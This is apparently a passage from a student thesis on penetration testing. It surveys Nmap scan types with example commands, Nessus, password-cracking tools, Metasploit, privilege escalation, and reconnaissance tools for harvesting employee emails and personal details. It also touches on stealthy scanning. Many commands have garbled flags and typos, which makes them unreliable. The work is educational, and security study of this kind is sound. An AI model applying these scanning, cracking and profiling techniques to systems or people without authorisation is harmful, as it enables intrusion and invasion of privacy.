Nmap is a scanning tool, however, to run a TCP connect on a command line, we issue the
following command from the terminal: nmap sT p- -PN 172.16.45.1-254 (172.16.45.1
172.16.45.254) an example. Take a moment to review this command. The first word nmap
causes the Nmap port scanner to start. The second command -sT tells Nmap to run a TCP
connect scan. Specifically, to break this switch down even further, the -s is used to tell Nmap
what kind of scan we want to run. The -T in the sT is used to run a scan type of TCP
connect. We use the -p-to tell Nmap to scan all the ports not just the default 1,000 as Nmap
capacity. We use the -PN switch to skip the host discovery phase and scan all the addresses as
if the system were alive and responding to ping requests.
Conducting laboratory penetration test using Nmap, intelligence phase was essential to
understand the type and amount of information available before the actual test. Intelligence
gathering ranged from passive information gathering, active information gathering to targeted
scanning of the system and network.
In a laboratory network, intelligence gathering was carried out by network surveying, port
scanning and operating system (OS) fingerprinting. Nmap along with a few tools like xprobes,
tcpdumb were used for information gathering. Nmap was extensively used because it gave a lot
of flexibility in designing targets. Nmap came pre-installed in Backtrack 5 R3 along with other
useful tool and was used to identify how many hosts reside within the network and their
associated IP address
Nmaps, ICPM ping-sweep was used to identify live host in the network segment. When all the
IP address and network segments were identified, port scanning along with OD and services
fingerprinting wre carried out against live hosts. Figure 2.4 shows a Nmap ICMP ping-sweep
scan run against a 10.0.0.0/24 network segment during network surveying.

21

Figure 2.5: Penetration Testing Topology

Figure 2.6: Nmaps ICMP ping-sweep scan of a network segment

From the above result, five live hosts responding to ICMP packets were identified. Among the
live hosts identified, host on 10.0.0.5 was a BackTrack machine and this host was not further
scanned because this machine was used as penetration machine. (i.e Penesters machine). This
BackTrack machine was connected to the target network for performing internal network and
system penetration test. The remaining four live hosts on 10.0.0.10. 10.0.0.12, 10.0.0.13 and
10.0.0.14 were further scanned and enumerated.

22

Figure 2.7: Enumerating the services on host 10.0.0.14

Now that we have used Nmap to list IPs, open ports, and services on each machine, it is time to
scan the targets for vulnerabilities. Vulnerability is a weakness in the software or system
configuration that can be exploited, mostly vulnerability come in many forms but often
associated with missing patches. Nessus is a great tool for scanning vulnerabilities and it used in
client/server architecture.
There are tools available that can automate vulnerability detection, many good vulnerability
scanners both commercial and open source are available. Some of them are;

Nessus

Shadow Security Scanner

Retina

ISS Scanner

GFI LAN guard

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerability that malicious hackers could use to gain access to any computer you
have connected to a network. It does this by running over 1200 checks on a given computer.
Nessus relies on the responses from the target computer without actually trying to exploit the
system. Depending on the scope of a vulnerability assessment, the security tester or hacker may
choose an exploitation tool to verify that reported vulnerabilities are exploitable.
In the environment of testing, the Nessus server performs the actual testing while the client
provides configuration and reporting functionality. Nessus client-server architecture is shown
below;

23

Nessus employs client-server architecture. The server contains the vulnerability database (plugins) and scanning engine and the client contains configuration tool and report-generating tool. It
starts the vulnerability scan after selecting an IP addresses to be scanned, plug-ins and Nessus
server. There are more than 1000 plug-ins available for Nessus each of which checks for one or
more vulnerabilities and after the scan is complete, it provides a detailed report of identified
vulnerabilities and recommends a solution. The main features of Nessus Vulnerability scanner
include:

Identifies operating system, applications, databases and services running on the host
systems.

Scan and detects open ports

Audit Antivirus Software

Discovers sensitive data such as credit card and numbers

Identifies missing security patches

Support all major operating systems

Web based interface

While running Nessus, a vulnerability assessment (or audit) has been done. This assessment
involves three distinct phases. It consists of:

Scanning

Enumeration

Vulnerability Detection

Scanning
In this phase, Nessus probes a range of IP addresses on a network to determine which hosts are
alive. One type of probing sends ICMP echo requests to find active hosts, but does not discount
hosts that do not respond-they might be behind a firewall. Port scanning can determine which
hosts are alive and what ports they have opened.
Enumeration
In this phase, Nessus probes network services on each host to obtain banners that contain
software and OS version information depending on what is being enumerated, username and
password brute forcing can also take place here.

24

Vulnerability Detection
Nessus probes remote services according to a list of known vulnerabilities such as input
validation, buffer-overflows improper configuration, and many more.
To run a scan, Nessus server must be running on some machine, then start up a Nessus client.
The two most important tabs are Nessus Host, which allows entering in the IP address of the
Nessus server to be connected, as well as the username and password needed to connect to this
server. The other critical tab is labeled Target Selection, this is where it is specified which host
(s) are liked to be scanned. Then, hit the Start san button.
After a scan, Nessus clients typically offer two means to analyze the result like the client itself
and will list each of the particular vulnerability found, gauging its level of severity and
suggesting to the user how this problem could be fixed.
Nessus clients are also to generate more comprehensive and graphical reports in a variety of
different formats. This can be very helpful if an administrator is scanning a large number of
computers and would like to get an overall view of the state of the network.

2.4. Exploitation and privilege escalation:


Exploitation is the process of gaining control over a system. Meanwhile an exploit is the
realization of vulnerability; exploits are issues or bugs in the software code that allow a hacker or
attacker to alter the original functionality of the software.
Base on exploitation, after gathering information by using reconnaissance and scanning however,
password cracking techniques can be used to get access to the target system. There are many
different tools that can be used for online password cracking; two of the most popular tools are

Medusa and Hydra.


Medusa is described as a parallel log-in brute force that attempts to gain access to remote
authentication services. Medusa is capable of authenticating with a large number of remote
services including Apple Talk Filing Protocol (AFP) which is use for client/server file sharing
protocol used in an Apple Talk network, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP,
NNTP, PcAnywhere, POP3, REXEC which stands for remote exec, it allows you to execute noninteractive programs on another system, RLOGIN, SMTP-AUTH, SNMP, SSHV2, Telnet, VNC,

25

Web Form, and more. In order to use Medusa, you need several pieces of information including
the target IP address, a username or username list that you are attempting to log-in as a password
or dictionary file containing multiple passwords to use when logging in, and the name of the
service you are attempting to authenticate with.
One of the requirements listed above is a dictionary list. A password dictionary is a file that
contains list of potential password and these lists are often referred to as dictionaries because
they contain thousands or even millions of individual words.
Once you have your password dictionary, you need to decide if you are going to attempt to log in
as a single user or if you want to supply a list of potential users. If your reconnaissance efforts
were rewarded with a list of usernames, you may want to start with those and if you were
unsuccessful in gathering usernames and passwords, you may want to focus on the results of the
email address you collected with the Harvester. Remember the first part of an email address can
often be used to generate a working domain username.
The 10 most popular password cracking tools are:

Brutus: It is one of the most popular remote online password cracking tools. It claims to
be the fastest and most flexible password cracking tool. This tool is free and is why only
available for windows systems. It supports HTTP (Basic authentication), HTTP (HTML
Form/CGI), POP3. FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc.
You can also create your own authentication types and this tool also supports multi-stage
authentication engines, however able to connect 60 simultaneous targets.

RainbowCrack is a hash cracker tool that uses a large-scale time memory trade off
process for faster password cracking than traditional brute force tools. Time-memory
trade-off is a computational process in which all plain text and hash pairs are calculated
by using a selected hash algorithm. After computation, results are stored in the rainbow
table. This process is very time consuming, but once the table is ready, it can crack a
password faster than brute force tool.

Cain and Abel is a well-known password cracking tool that is capable of handling a
variety of task. The most notable thing is that the tool is only available for windows
platform. It can work as sniffer in the network, cracking encrypted passwords using the
dictionary attack, recording VOIP conversations, brute force attacks, cryptanalysis
attacks, revealing password boxes, uncovering cached passwords, decoding scrambled

26

password and analyzing routing protocols. Cain and Abel doesnt exploit any
vulnerability or bugs, rather is only covers security weakness of protocols to grab the
password. This tool was developed for network administrators, security professionals,
forensics staffs, and penetration testers.

John the Rapper is another well-known free open source password cracking tool for
Linux, UNIX and Mac OS. It window version is also available. This tool can detect weak
passwords.

Thc Hydra is a faster network logon password cracking tool. When it is compared with other

similar tools, it shows why it is faster and available for windows, Linux, free BSD, Solaris and OS
X. This tool supports various network protocols. Currently it supports Asterisk, AFP, Cisco AAA,
Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTPGET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET,
HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle
Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh,
SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Figure 2.9 shows web interface of Thc-Hydra.

Figure 2.9 Thc-Hydra interfac

27

Medusa is also a password cracking tool similar to THC Hydra. It claims to be a speedy parallel, modular and
login brute forcing tool. It supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MYSQL, NCP, NNTP, POP3,
PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, and Telnet. While cracking the
password, host, username and password can be flexible input while performing the attack. Medusa is a
command line tool, so you need to learn commands before using the tool. Efficiency of the tool depends on
network connectivity. On a local system, it can test 2000 passwords per minute. With this tool, you can also
perform a parallel attack. Suppose you want to crack passwords of a few email accounts simultaneously. You
can specify the username list along with the password list.

Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA password. It analyzes
wireless encrypted packets and then tries to crack password via its cracking algorithm. It uses the FMS
attack along with other useful attack techniques for cracking password. Aircrack-NG is available for
Linux and Windows systems.

Figure 2.10: Airtrack-NG interface for cracking password.

Metasploit is an important exploitation tool however, it is important to understand the distinction


between Metasploit and a vulnerability scanner. In most instances, when we use a vulnerability
scanner, the scanner will only check to see if a system is vulnerable. This occurs in a very
passive way with little chance of any unintentional damage or disruption to the target. Metasploit

28

and other frameworks are exploitation tools. These tools do not perform tests; these tools are
used to complete the actual exploitation of the target. Vulnerability scanners look for and report
potential weaknesses whiles Metasploit attempts to actually exploit the systems it scans.
Exploits are the weaknesses that allow the attacker to execute remote code (payloads) on the
target system. Payloads are the additional software or functionality that we install on the target
system once the exploit has been successfully executed. After logging into a system a tool known
as John the Ripper tool can be used for cracking passwords and escalating privileges is that many
of the tools we run as penetration or hacking techniques require administrative-level access in
order to install and execute properly. If we can access the password hashes on a target machine,
the chances are good that with enough time, John the Ripper (JtR), a password-cracking tool, can
discover the plaintext version of a password. Password cracking consists of two parts:

Locate and download the target systems password hash file.

Use a tool to convert the hashed (encrypted) password into a plaintext password.

Most systems do not store your password as the plaintext value you enter, but rather they store an
encrypted version of the password. This encrypted version is called a hash. For example, assume
you pick a password qwerty. When you log into your PC, you type your password qwerty to
access the system. However, behind the scenes your computer is actually calculating and
checking an encrypted version of the password you entered. The encrypted version or hash of
your password appears to be a random string of characters and numbers.
The exploitation phase is the attacking phase and this is the phase that separates the boys from
the men. This is at the heart of any hacker or penetration tester, the most interesting and
challenging phase. After determining the vulnerabilities that exist in the systems, the next stage is
to identify suitable targets for a penetration attempt.
An attack phase can be further categorized into the following:

Exploitation phase

Privilege Escalation phase

29

Exploitation phase can be dangerous if not executed properly. There are chances that, running an
exploit may bring a production system down. All exploits need to be thoroughly tested in a lab
environment prior to actual implementation. There are good exploitation frameworks available
that would aid a hacker or penetration tester in developing exploits and executing then in a
systematic manner. Few good commercial as well as open-source exploitation frameworks are:

The Metasploit project

Core Security Technologys Impact

Immunitys CANVAS

Penetration tester or hacker can make full use of the potential of such frameworks, rather than
using it for merely running exploits. These frameworks can help reduce a lot of time in writing
custom exploits.

2.4.1Privilege Escalation:
Sometimes, a successful exploit does not lead to root access. For example, for a particular
vulnerability, the hacker or the pen tester might acquire user level access. An effort has to be
made at such point to carry further analysis on the target system to gain more information that
could lead to getting administrative privileges, e.g local vulnerabilities, etc. A penetration tester
or hacker might need to install additional software that might help in getting a higher level of
privilege. This process is called privilege escalation.
A hacker or penetration tester also considers pivoting through targeted systems on successful
exploitation. Pivoting is a process in which a hacker uses the compromised (target) system to
attack other systems in the target network.

2.5. Conclusion:
My literature review gives general view about hacking or penetration testing. I realized the books
and articles review gives accurate information to readers who can sit in their home conformably
to compromise with a targeted system. However, the strength of the review gives broad
knowledge of all techniques apply in hacking, the most important knowledge acquire is that

30

organizations needs to train their staffs especially about reconnaissance because this aspect is the
key technique apply in hacking after sophisticated preventive equipment are deployed.
Controversially, different tools are used in penetration testing and hacking therefore, users have
to be trained specifically in terms of tools to be used. Linux operating systems has in-built
hacking or penetration testing tools integrated in Linux operating system known as BlackTrack 5
R3 whiles Ubuntu has blackbuntu which has numerous hacking or penetration testing tools inbuilt in Ubuntu operating system.
My literature review research question helps to define the most important and efficient general
tools to be used to perform penetration testing or hacking and narrow it down to training staffs of
an organization to be knowledgeable about Reconnaissance and social engineering for computer
users. Knowing well that reconnaissance and social engineering are the most crucial techniques
hackers use to begins their action.
Limitation of penetration testing: Penetration testing cannot be expected to identify all possible
security weaknesses, nor does it guarantee that it is 100% secure. New technology and hacking
methods can create new exposures not anticipate during the penetration testing. Thus, it is
certainly possible that after a penetration testing, there could be hacking incidents thereafter
because it is impossible to have full but rather only good protection for an organizations security
system.

31

CHAPTAR THREE

METHODOLOGY
3.0 INTRODUCTION
For effective and successful penetration testing, information gathering is a prime aspect, and
must be given utmost importance by security researchers. An attacker will attempt to gather as
much information about the target as possible before executing an attack. This enables the
attacker to be more refined and efficient than if it were carried out without much information
about the target.
Penetration testing is more narrowly focused phrase, it deals with the process of findings flaws in
a target environment with the goal of penetrating a system, taking control of them. Penetration
testing as the name implies, is focused on the penetration of the target organization defenses,
compromising systems and getting access to information.
With Ethical hacking, is an expensive term encompassing all hacking techniques, and computer
attack techniques to find security flaws with permission of the target owner and the goal of
improving the target security, whiles penetration testing is more focused on the process of
finding vulnerabilities in a target network environment or systems?
When it comes to advance hacking and penetration testing methodologies you can basically
narrow the field down to three. These are:
1. Open source security testing methodology manual (OSSTMM); series of standard test
designed to deliver results as verified facts that provides actionable information in order
to strengthen security operation
2. Penetration testing executive standard (PTES); Standard for penetration execution along
with technical guidance
3. National institute of standard and technology: guide to security testing and assessment
(NIST 800-115) guide for conducting pen testing and security assessments. Contains
guidance on techniques and methodology when performing information security
assessment.

32

Actually research methodology is basically a systematic way to solve a problem however,


National Institute of Standards and Technology 800-115 (NIST-800-115) is a guide for
conducting technical security assessment. It contains guidance on techniques and methods that
an assessor should use when performing an information security assessment and it provide more
flexibility during penetration testing.
The four phases of methodologies to be discussed are; Information gathering, Scanning,
Vulnerability Analysis, Attack phase which comprises (vulnerability exploitation, escalation
privilege), and Evading defense & Erasing Tracks.
The methodology being used is based on kali Linux which are integrated with certain high level
tools using NIST 800-115 methodology.
The combination of penetration testing and hacking can be broken down into a series of steps or
phases. When put together, these steps form a comprehensive methodology. The use of an
organized approach is important because it not only keeps the penetration tester focused and
moving forward but also allows the results or output from each step to be used in the ensuring
steps.
This standard addresses and covers network penetration testing methodologies at a high level.
These documents focus on testing framework, information on recommended security tools to use
and rules of engagement.
The use of methodology allows you to break down a complex process into a series of smaller
more manageable task. Understanding and following s methodology is an important step in
mastering the basic of hacking. This methodology usually contains four major phases which
made up of many sub-headings.

33

Figure 3.1

NIST 800-115 Methodology

3.1 Information gathering:


The most important event in black box hacking is information gathering or reconnaissance which
is the method of arming a hacker for the task before him/her. This information gathering phases
are social engineering, passive and active reconnaissance which has been review in chapter two.
This chapter is all about dealing with tools that are used to accomplish information gathering and
some of the best tools are;

3.1.1. Active reconnaissance tool:


Maltego is an information gathering tool which offers broadly two types of reconnaissance
options, namely, infrastructural and personal. Infrastructural reconnaissance deals with the
domain, covering DNS information such as name servers, mail exchangers, zone transfer tables,
DNS to IP mapping, and related information. Personal reconnaissance on the other hand includes

34

personal information such as email addresses, phone numbers, social networking profiles, mutual
friend connections.
Maltego tool uses seed servers by sending client data in the XML format over a secure HTTPS
connection. Once processed at the server side, the requested results are returned to the maltego
client. Gathering of all publicly available information using search engines and manual
techniques is cumbersome and time consuming. Maltego tool largely automates the information
gathering process, thus saving a lot of time for the attacker. Carrying out personal
reconnaissance, we can enumerate various kinds of information from the name provided to us.
These include email addresses, URLs, social network profiles of a person and mutual
connections between two people. This information can be effectively used in a social engineering
attack to either pawn (a person who does not have any real power but is used by others to
achieve something) the victim or to gather even more information needed for the attack. Suppose
say the attacker obtains the name of a person, mining of data related to the name would start with
targeting the persons email-ID. Maltego offers email-ID transform using search engine and is
explained in the screenshot shown in figure 3.2

Figure 3.2
As showed evident from Figure 3.2, the search engine queries returns a large number of email
addresses.

TheHarvester is a tool to gather emails, subdomains, hosts, employee names, open ports and
banners from different public sources like search engines. This tool is intended to help

35

penetration tester in the early of the project its a really simple tool but very effective and the
sources supported are;

Google emails, subdomains/hostnames

Google profiles - Employee names

Bing servers emails, subdomains/hostnames, virtual host

Pgp servers. emails, subdomain/hostnames

Linkedln employee names

Exalead - emails, subdomain/hostnames

Creepy is a geo-location tool that helps social engineering perform successful information
gathering. After installation is complete, it gives you a nice GUI interface in the above figure.

Figure 3.3 Creepy tool interfaces

After inputting the target information and press the enter key you will obtain information such as
the above figure below.

36

Figure 3.4 showing the target information via geo-location

Dmitry tool is also an information gathering tool mostly used in Kali Linux operating system. Dmitry
has the ability to gather as information as possible about a host. Base functionality is able to gather
possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more. This
informations are gathered with the following methods:

Perform an internet number whois lookups

Retrieve possible uptime data, system and server data

Perform a subdomain search on a target host

Perform an email address search on a target host

Perform a TCP port scan on the host target

Dmitry I command is use to perform a whois lookup of the IP address of a host on kali Linux
operating system. The illustrative diagram shows information about a Dmitry I command.

37

Figure 3.5

When you open a terminal and type Dmitry and hit enter, it will gives you details of other
sub-commands. The diagram below show details sub-commands after typing Dmitry at
the command line.

Figure 3.6 shows Dmitry sub-commands details

Jigsaw is a Ruby script-based email enumeration tool that accesses the Jigsaw business
directory. It generates email addresses in one of four popular naming conventions from
information available in the database. The Jigsaw directory, meanwhile, is a crowd
sourced; more than 27 million company profiles are in the directory which is maintained
by more than one million users.
It is a rich haunting ground for cybercriminals and an important tool for pen-testers and
enterprise security teams assessing the awareness of employees to the dangers of email
based spam and phishing campaigns. The Jigsaw tool is intuitive. A user simply enters a
search argument such as their target company name and the toll returns all the companies
it has knowledge of with the name plus the number of employees listed, and the
companys jigsaw directory ID. Knowing the ID, an attack, for example, can get much
more granular and find employee names per department, for example, based upon whats

38

available in the directory. The attacker the supplies the tool with a domain name of the
company and the jigsaw tool generates a list of possible email addresses.
One thing the directory doesnt have is the employees email address, what Jigsaw does
is generates email addresses for you. The way it does that is, it uses four common
formation used by companies as log-ins and attaches those to the supplied domain name.
Since an attacker may not know the target companys particular email convention, the
Jigsaw tool will generate a list of email addresses using either first letter or last name,
first name dot last name. First name first letter of the last name, and last name first letter
of first name appended to the domain name supplied. All information is displayed to the
attacker who can save them to a comma-separated value (CSV) {stores tabular data in
numbers and plain text}.
Royce Davis, one of the developers of Jigsaw, said that organizations need to think hard
about the information they share online and in other forums.
In the case of the Jigsaw database, I do not believe companies are intentionally providing their
information. I believe the records are harvested from business cards which get handed out like
candy at various conferences and public gatherings. An attacker doesnt need to necessarily
obtain a users email address. Simply obtaining their first and last name is often enough to craft a
valid email address. For this reason I would recommend that companies become more creative
with their username conventions. For example, the first and last initial combined with a unique
identifier could be look like dg9810@example.com, this would be more difficult to guess than
the more traditional firstname.lastname@example.com.

Metagoofil is an information gathering tool designed for extracting metadata of public


documents (pdf, doc, xls, ppt, docx, pptx, xlsx) belonging to a target company. The tool will
perform a search in Google to identify and download the documents to local disk and then
extract the metadata with different libraries like Hachoir, PdfMiner and others. The information
which can be found using metadata ar usernames, path, MAC address, Software, Operating
Systems etc. This information can be used later on to help in the penetration testing phase.

39

Figure 3.7

MetaGooFiL

MetaGooFiL is an information gathering tool, to be more exact its a metadata extraction tool
that is written by the same people who wrote the harvester, Metadata is often defined as data
about data, when you create a document like Microsoft word or PowerPoint presentation;
additional data is created and stored within your file. This data often includes various piece of
information that describe the document included the file name, its size, even the owner or the
person who created that file, including the location and path where it was first saved. This
process occurs automatically without any input from the user.
The ability for an attacker for this great information may present some great insight into the
target organization, including usernames, system names, files shares, and other stuffs.
MetaGooFil is a tool that scours the internet high and looking for documents that belong to your
target. After finding these documents they will then be downloaded and attempts to extract the
useful metadata will begin.
MetaGooFil is built into backtrack 5 and can be found in the all programs backtrack menu. eg.
Cd/pentest/enumeration/goggle/metagoofil. After navigating to the directory, it is a good idea to
create a files folder. so all data you downloaded and collect will be stored here, this keeps the
original directory clean. You can also create a new folder by entering $ mkdir files.

3.2. Passive Reconnaissance Techniques


Reconnaissance can be divided into at least two categories, active and passive. Active
reconnaissance requires that you interact with the target computer system to gain information

40

about it. Although this can be very useful and accurate, it risks detection doing reconnaissance
on a system, the system admin may choose to block your IP address and you will leave a trail to
your subsequent activity.
If possible, we would prefer to gather the essential information without ever interacting with the
system, thus leaving no trail to track back to us. Thats what passive reconnaissance is all about.
Although there are a number of ways to conduct passive reconnaissance, one of the best ways is
to use a website like Netcraft.
Step 1: Navigate a Browser to Netcraft
When you navigate to Netcraft website, you will see a webpage that looks like this,

Figure 3.8

Netcraft is a website that tracks virtually every website on the planet. From this data, they are
able to calculate market share for web servers, uptime, etc, becoming one of the leading
authorities for this type of information. They also offer some security services such as antiphishing extension and phishing alerts.
Another service that Netcraft offers is data about nearly every website. This data can be
extremely valuable to the hacker. Notice on the right side of the webpage, the area that asks
Whats that site running?

Step 2: Search a Domain

41

As we can see in the screenshot below, we simply typed in a domain name and Netcraft.com
returns for the domain. Notice that in this case, it returns two sites

Figure 3.9

Step 3: Open the Site Report


Now we can open the site and get some critical information about this site. We can see at the top
of this report, such information as site rank, primary language, IP address and nameserver.

Figure 3.10
If we scroll down a bit, we can get some excellent information that would be useful to a potential
attacker.

42

Figure 3.11
We can see under the heading Hosting History the net block owner, IP address (es), operating
system, web server, and when the server was last changed. All of this can be useful to the hacker,
including the data last changed. This date generally represents the date the system was last
rebooted or updated.
Step 4: Site Technology
When we scroll down a bit further, we come to a section titled Site Technology. Here we get
a run down on the technology the sites running.

43

Figure 3.12

This listing provides us with information of what technologies the site is running and from here
the hacker can seek out vulnerabilities in these named technologies. This is a boon for hackers as
they dont have to guess what technologies are behind the website. As every hack is specific to a
technology, knowing what technologies they are running makes it easier for the hacker to find
the appropriate hack.

3.3. SCANNING:
Scanning is a technique to scan a network for discovery of flaws on a network such as
application ports, Operating system versions, software loopholes, IP addresses and many more.

3.3.1 Networking discovery information tools are;


Fierce.pl is a very lightweight scanner- written by RSnake in perl that helps you locate IP space
hostnames against specified targeted domain name. It provides different techniques to gather

44

information about your victim. This tool will help you for the first steps of a pen testing: the
reconnaissance.
The idea is to gather as much interesting details as possible about your target before starting the
attack. Fierce is used for DNS Enumeration and has been included in Backtrack and Kali Linux
distributions. It is a great tool for discover non-contiguous IP address for a certain company and
you can try a DNS transfer zone, DNS brute-force, and reverse lookups.
Using this example, we can find NS, zone transfer information about a target domain. In this
figure we are getting successful zone transfer

Figure 3.13 Fierce zone transfer information

Fping is a program like ping which uses the internet control message protocol echo
request to determine if a target host is responding. Fping differs from ping in that you can
specify any number of targets on the command line, or specify a file containing the list of
targets to ping. Instead of sending to one target until it times out or replies, fping will
send out a ping packet and move on to the next target in a round-robin fashion. Unlike
ping, fping is meant to be used in script, so its output is designed to be easy to parse.
Using Ubuntu which has fping, For example, you can do a network scan that sends one
ping packet per/IP by typing $fping a r 0 g 172.31.0.0/24

45

Fping has many options as follows:


-a:

Shows systems that are alive

-A:

Display target by address rather than DNS name

-bn:

Number of bytes of ping data to send

-Bn:

In the default mode, fping sends several request to a target before giving up, waiting longer for a
reply on each successive request. The parameter is the value by wich the wait time is multiplied
on each successive request.Itmust be entered as a floating-point number (x,y). The default is 1.5

-c:

Number of request packets to send to each target. In this mode, a line is displayed for each
received response (this can suppressed with q or -Q). Also, statistics about responses for each
target are displayed when all request have been sent (or interrupted)

-C:

Similar to c, but per the target statistics are displayed in a format designed for automated
response-time statistics gathering. Example $fping C 5 q hostname

-d:

Use DNS lookup address of return ping packet. This allows you to give fping a list of IP
addresses as input and print hostname in the output

-e:

Show elapsed (round-trip) time of packets

-f:

Read a list targets from a file. This option can only be used by the coot user. Regular users
should pipe in the file via stdin: $fping <target_file

-g:

Generate a target list from a supplied IP network, or a starting and ending IP addresses. Specify
the netmask or start.end in the targets portion of the command line.

-h:

Print usage message

-in:

The minimum amount of time (in milliseconds) between sending a ping packet to any target
(default is 25)

-l:

Loop sending packets to each target indefinitely. Can be interrupted with ctl-C, statistics about
responses for each target are then displayed

-m:

Send ping s to each of the target host with multiple interfaces

-n:

same as d

-p:

In looping or counting modes (-1,-c, or -C), this parameter sets the time in milliseconds that
fping waits between successive packets to an individual target. Default is 1000.

-q:

Quiet. Dont show per-target results, just set final status

-Qn:

Like q, but show summary results every n seconds

46

-rn:

Retry limit (default 3). This is the number of times an attempt at pinging a target will made, not
including the first try.

-s:

Print cumulative statistics upon exit

-tn:

Initial target time out in milliseconds (default 500). In the default mode, this is the amount of
time that fping waits for a response to its first request. Successive time out are multiplied by the
back off factor

-u:

Show target that are unreachable

-v:

Print fping version information

DNSDICT6 is an information gathering tool provided with Backtrack. This tool is used to find all the
sub-domain of a website or web server. The most advance use of dnsdict6 is to enumerate all IPV4 and
IPV6 addresses and extract dumbs like sub-domains, IP information however, this tool is quite a
powerful tool because it also extracts those sub-domains which are restricted or even invisible for users.
There are certain parameters that we can use with dnsdict6:
1. d is used to display information on Name Servers and MX Records
2. -4 is used to dumb IPV4 addresses
3. There are four types of dictionary which are already inbuilt in this tool. s (mall=50), m(edium=796) (DEFAULT) I(arge=1416), or x(treme=3211).
4. t is used to specify no. of thread

3.3.2: Scanning network ports and service identification tools are follows;

dnmap is a framework to distribute nmap scans among several clients. It reads an already created
file with nmap commands and sends those commands to each client connected to it.
The framework uses client/server architecture. The server knows what to do and the client does it
and all the logic and statistics are managed in the server. Nmap output is stored on both server and
client.
Usually you would want this if you have to scan a large group of host and you have several different
internet connections.
Features of dnamp server are the following;

47

If the server gets down, clients continue trying to connect until the server gets back online

If the server get down, when you put it up again it will send commands starting from the last
command given before the shutdown. You do not need to remember where it was.

You can add new commands to the original file without having to stop the server. The server
will read them automatically.

If some client goes down, the server will remember which command it was executing and it
will re-schedule it for later.

It will store every details of the operations in a log file

It shows real time statistics about the operation of each client, including:
Number of commands executed
last time seen
version of the client
If the client is being run as root or not
If calculates the amount of commands executed per minutes
The historic average of the commands executed per minutes
The status of the client (online, offline, Executed or Strong)

You can choose which port to use. the defaults port is 46001

Only the online clients are shown in the running statistics.

Features of dnmap client are as follows;

If the server gets down, it keeps connecting to it until it gets up again

Strip strange characters from the command sent by the server. Tries to avoid command injection
vulnerability

It only executes the nmap command. It deletes the command send by the server and changes it by
the known and trusted nmap binary on the system.

You can select an alias for your user

You can change which port the client connects to.

If the command sent by the server does not have a -0A option, the client add it anyway to the
command, so it will always have a local copy of the output.

If the server sends a min-rate parameter, it is striped out.

48

You can control the nmap scanning rate regardless of servers sent parameters

Tell the server if you are root or not, so it can change the nmap commands accordingly.
As dnmsp is integrated in KaliLinux , first of all start dnmap server by the following steps
Application kali Linux information gathering Live Host Identification dnmap-server

Figure 3.14 steps to open dnmap


After the terminal has been open type dnmap-server and hit the enter key which gives you this
displays in figure 3.14

Figure 3.15 information of dnmap command on the terminal

49

As you can see in figure 3.6 underneath, the server requires a file containing our Nmap
commands to run

Figure 3.16 show dnmap server command running

Nmap: Network Mapped (Nmap) is a network scanning and host detecting tool that is very
useful during several steps of penetration testing and hacking. Nmap is not limited to merely
gathering information and enumeration, but it is also powerful utility that can be used as a
vulnerability detector or a security scanner. Nmap is a multipurpose tooland it can be run on
many different operating systems including Windows, LINUX, BSD, and Mac. Nmap is a very
powerful utility that can be used to:

Detect the live host on the network (host discovery)

Detect the open ports on the host (port discovery and enumeration)

Detect the software and the version to the respective port (service discovery)

Detect the operating system, hardware address, and the software version

Detect the vulnerability and security holes (Nmap scripts)

There are so many scanning techniques available on Nmap, including the TCP connects scanning
method and these are the most popular scanning techniques.

50

TCP SYN Scan (-sS): It is a basic scan and it is also called half-open scanning because this techniques
allows Nmap to get information from the remote hosts without the complete TCP handshake process.
Nmap send SYN packets to the destination, but it does not create any sessions. As a result the target
computer cant create any log of the interaction because no session was initiated, making this feature an
advantage of the TCP SYN scan.
If there is no scan type mentioned on the command line, then avTCP SYN is used by default but it
requires the root/administrator privilege. Example using window platform #nmap sS 192.168.1.1

TCP connect () scan(-sT): This is a default scanning technique used, if and only if the SYN scan is not
an option because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the
normal TCP three handshake process and requires the system to call connect (), which is part of the
operating system. Keep in mind that this technique is only applicable to find out the TCP ports not the
UDP ports. Example #nmap sT 192.168.1.1

UDP Scan (-sU): As the name suggest, this techniques is used to find an open UDP port of the target
machine. It does not require any SYN packet to be sent because it is targeting the UDP ports. But we can
make the scanning more effective by using sS along with sU. UDP scan send the UDP packets to the
target machine, and waits for a response if an error message arrives saying the ICMP is unreachable,
then it means that the port is closed: But if it gets an appropriate response, then it means that the port is
open. Example #nmap sU 192.168.1.1

FIN scan(-sF): Sometimes a normal TCP SYN scan is not the best solution because of the firewall,
Intrusion detection system (IDS) and Intrusion prevention system (IPS) scans might be deployed on the
target machine, but firewall will usually block the SYN packets. A FIN scan sends the packet only set
with the FIN flag. So it is not required to complete the TCP handshaking.
Example root@bt-tt nmap sF 192.168.1.8
Ping scan (-sP): Ping scanning is unlike the other scan techniques because it is only used to find out
whether the host is alive or not. It is not used to discover open ports. Ping scans require root access
ICMP can be sent, but if the user does not have the administrator privilege then the ping scan uses
connect () call. Example #nmap sP 192.168.1.9

51

Version Detection (-sV): Version detection is the right technique that is used to find out what software
version is running on the target computer and on the respective ports. It is unlike the other scanning
techniques because it is not used to detect the open ports, but it requires the information from open ports
to detect the software version. In the first step of this scan technique; version detection uses the TCP
SYN scan to find out which ports are open. Example #namp sV 192.168.1.8

Idle scan (-sI): Idle scan is one of my favorite techniques, and it is an advance scan that provides
complete anonymity while scanning. In idle scan, Nmap doesnt send the packets from your real IP
address instead of generating the packets from the attacker machine. Nmap uses another host from the
target network to send the packets. Lets consider an example to understand the concept of idle scan.
Example # namp sI 1 ait_host target_host
#nmap sI 192.168.1.2 192.168.1.5

